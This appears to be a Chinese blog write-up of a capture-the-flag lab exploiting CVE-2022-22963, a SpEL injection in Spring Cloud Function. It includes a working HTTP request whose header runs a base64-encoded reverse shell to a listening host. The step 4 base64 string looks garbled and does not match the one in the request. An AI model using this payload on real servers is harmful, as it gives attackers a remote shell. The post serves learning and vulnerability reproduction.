春秋云境:CVE-2022-22963

已于 2024-03-08 12:56:38 修改
阅读量979 收藏 4
点赞数
分类专栏: 春秋云境-靶场 文章标签: 安全 安全漏洞 web安全 网络安全 cve
于 2023-01-20 15:31:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laobanjiull/article/details/128741988
版权

春秋云境:CVE-2022-22963

文章合集春秋云境系列靶场记录(合集)

关注WX:【小白SEC】查看更多内容……

Spring Cloud Function functionRouter SPEL代码执行漏洞:CVE-2022-22963

在这里插入图片描述

漏洞介绍

SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 题目链接为:http://ip:port P.S 卡慢不影响拿flag

解题步骤

  1. 访问URL是报错页面,使用BurpSuite抓包:
    在这里插入图片描述

  2. 访问:进行抓包,发送到【Repeater】模块
    在这里插入图片描述

  3. VPS开启端口监听:

  4. 构造反弹shell命令并进行base64加密:{echo,c2ggLWkgPiYgE2OiCM90YkL2RldyLj3AvMTDAuMS83MDAzIDA+JjE=}|{base64,-d}|{bash,-i}
    在这里插入图片描述

  5. 返回BurpSuite修改数据包为如下:

POST /functionRouter HTTP/1.1
Host: 47.95.3.91:37939
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS83MDAzIDA+JjE=}|{base64,-d}|{bash,-i}")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述

  1. 查看VPS,反弹shell成功,查看flag
    在这里插入图片描述

文章合集春秋云境系列靶场记录(合集)

Acczdy
关注
专栏目录
春秋云境.com】CVE-2022-32991通关思路
BG_ONE的博客
12-04 1100
春秋云境.com】CVE-2022-32991思路
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 692
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
vulhub远程执行命令漏洞CVE-2022-22963
最新发布
qq_65852138的博客
09-08 322
vulhub远程执行命令漏洞CVE-2022-22963
[春秋云镜]CVE-2022-22963
niubi707的博客
11-29 707
[春秋云镜]CVE-2022-22963复现
春秋云境CVE-2022-22963[漏洞复现]
如有错误感谢斧正
08-10 694
到2024年8月11日,为期14天的专项国护结束最近都在忙攻防看1day、nday复现,现在有空了写一下靶场的复现。
CVE-2022-22963-Spring-Core-RCE图形化利用工具
LiBai'S BLOG
04-01 9993
CVE-2022-22963 描述:Spring4Shell - Spring Core RCE - CVE-2022-22965 链接:https://github.com/TheGejr/SpringShell 描述:Spring4Shell Proof Of Concept/Information CVE-2022-22965 链接:https://github.com/BobTheShoplifter/Spring4Shell-POC 描述:This includes CVE-2022-22
CVE-2022-22963:Spring Cloud Function SpEL 远程代码执行漏洞
m0_59092234的博客
09-02 931
SpringCloud Function作为SpringCloud家族成员最早在2017年提出,旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同时对于SpringBoot熟悉的人可以迅速上手最近Spring Cloud Function组件爆出0day – SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...
春秋云境CVE-2022-29464
07-28
- *1* [【春秋云境CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963
chaojixiaojingang
04-06 7658
1.漏洞描述 SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 2.影响版本 Spring Cloud Function 3.0.0 <...
『Java CVECVE-2022-22963: Spring Cloud Function SPEL表达式注入RCE
Ho1aAs‘s Blog
07-28 1477
## 漏洞简介 向`/functionRouter`路由发送headers带有`spring.cloud.function.routing-expression`键的POST包时,会触发SPEL解析该键值 ## 影响范围 3.0.0
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现
热爱学习,喜欢折腾!
08-28 5472
SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。............
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3121
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
每日一漏洞(cve-2022-22963
jjjj1029056414的博客
07-18 172
复现cve-2022-22963(Spring Cloud Function SpEL表达式命令注入)
SpringCloud Function SpEL漏洞复现 (CVE-2022-22963)
oiadkt的博客
04-21 1034
SpringCloud Function SpEL漏洞复现 (CVE-2022-22963)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值